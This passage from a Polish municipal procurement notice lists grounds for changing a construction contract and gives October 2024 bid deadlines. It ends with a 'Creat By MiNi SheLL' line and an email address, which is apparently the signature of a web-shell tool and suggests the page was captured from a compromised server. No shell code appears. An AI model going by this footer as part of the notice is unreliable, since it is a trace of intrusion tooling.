projektowej warunków geologicznych (kategorie gruntu, kurzawka, głazy narzutowe, warunki gruntowe itp.),<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty itp.),<br/>b) wystąpieniem następstw działania organów administracji, które w szczególności dotyczyć będą:<br/>- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.,<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,<br/>c) zaistnieniem uwarunkowań organizacyjno-technicznych, w szczególności mających miejsce w modernizowanych i remontowanych obiektach, gdzie realizacja robót uwarunkowana jest przekazaniem frontu prac przez Użytkownika, bądź realizacji prac przez więcej niż jednego wykonawcę na wspólnym placu budowy, a także w przypadkach przerwania robót objętych przedmiotem umowy na czas realizacji robót dodatkowych nie objętych zamówieniem podstawowym prac niemożliwych do przewidzenia albo prac polegających na powtórzeniu podobnych robót budowlanych, usług lub dostaw, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umtorun.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-08 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Projektowane zmiany umowy, c.d.:<br/><br/>d) zaistnieniem uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu Stron,<br/>e) wystąpieniem innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz od Wykonawcy skutkujących niemożliwością prowadzenia prac, w szczególności: brak możliwości dojazdu oraz transportu materiałów na teren budowy spowodowany awariami, remontami lub przebudowami dróg dojazdowych, protesty mieszkańców, przerwy w dostawie energii elektrycznej, wody, gazu, przerwy lub opóźnienia w dostawie materiałów lub urządzeń dedykowanych do wykonania przedmiotu umowy; <br/>f) wystąpieniem innych przyczyn leżących po stronie Zamawiającego, które w szczególności dotyczyć będą:<br/>- nieterminowego przekazania terenu budowy przez Zamawiającego,<br/>- wstrzymania robót przez Zamawiającego,<br/>- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>-przedłużającej się procedury wyboru oferty - powyżej 30 dni, <br/>z zastrzeżeniem, że w przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty;<br/>4)	jeżeli zmiana umowy dotyczyć będzie zmiany wysokości wynagrodzenia dla Wykonawcy, a spowodowana będzie: <br/>-	zmianą terminu wykonania prac przez Wykonawcę, jeżeli zmiana terminu wykonania prac spowoduje bezpośrednio wzrost lub obniżenie kosztów wykonania zamówienia po stronie Wykonawcy,<br/>-	zmianą stawki podatku VAT (wynagrodzenie netto nie ulegnie zmianie);<br/>5)	jeżeli zmiana umowy dotyczyć będzie zmiany inspektora nadzoru inwestorskiego (zmiana ta wymaga jedynie dokonania powiadomienia pisemnego Wykonawcy przez Zamawiającego); <br/>6)	jeżeli zmiana umowy spowodowana będzie siłą wyższą, w tym epidemią, stanem zagrożenia epidemicznego, stanem epidemii, uniemożliwiającą wykonanie przedmiotu umowy zgodnie z SWZ i obejmować będzie zmianę umowy w szczególności w zakresie przedmiotu, terminu wykonania, wysokości wynagrodzenia lub terminu przeprowadzenia odbioru przedmiotu umowy;<br/>7)	jeżeli zmiana umowy dotyczyć będzie zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy w szczególności na skutek zmian<br/>w zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;<br/>8)	jeżeli zmiana umowy dotyczyć będzie zmiany (wydłużenia) terminu określonego w §3 ust. 2, z przyczyn niezależnych od obu Stron (zmiana ta wymaga jedynie dokonania powiadomienia pisemnego Wykonawcy przez Zamawiającego zawierającego nowy termin).<br/>4.	Jeżeli zmiana umowy wymaga zmiany dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, Strona inicjująca zmianę przedstawi:<br/>-	projekt zamienny zawierający opis proponowanej zmiany wraz z informacją o konieczności zmiany pozwolenia na budowę,<br/>-	przedmiar i niezbędne rysunki.<br/>5.	Do każdej propozycji zmiany, inicjujący zmianę przedstawi: <br/>-	opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>-	uzasadnienie zmiany,<br/>-	obliczenia uzasadniające ewentualną zmianę wynagrodzenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com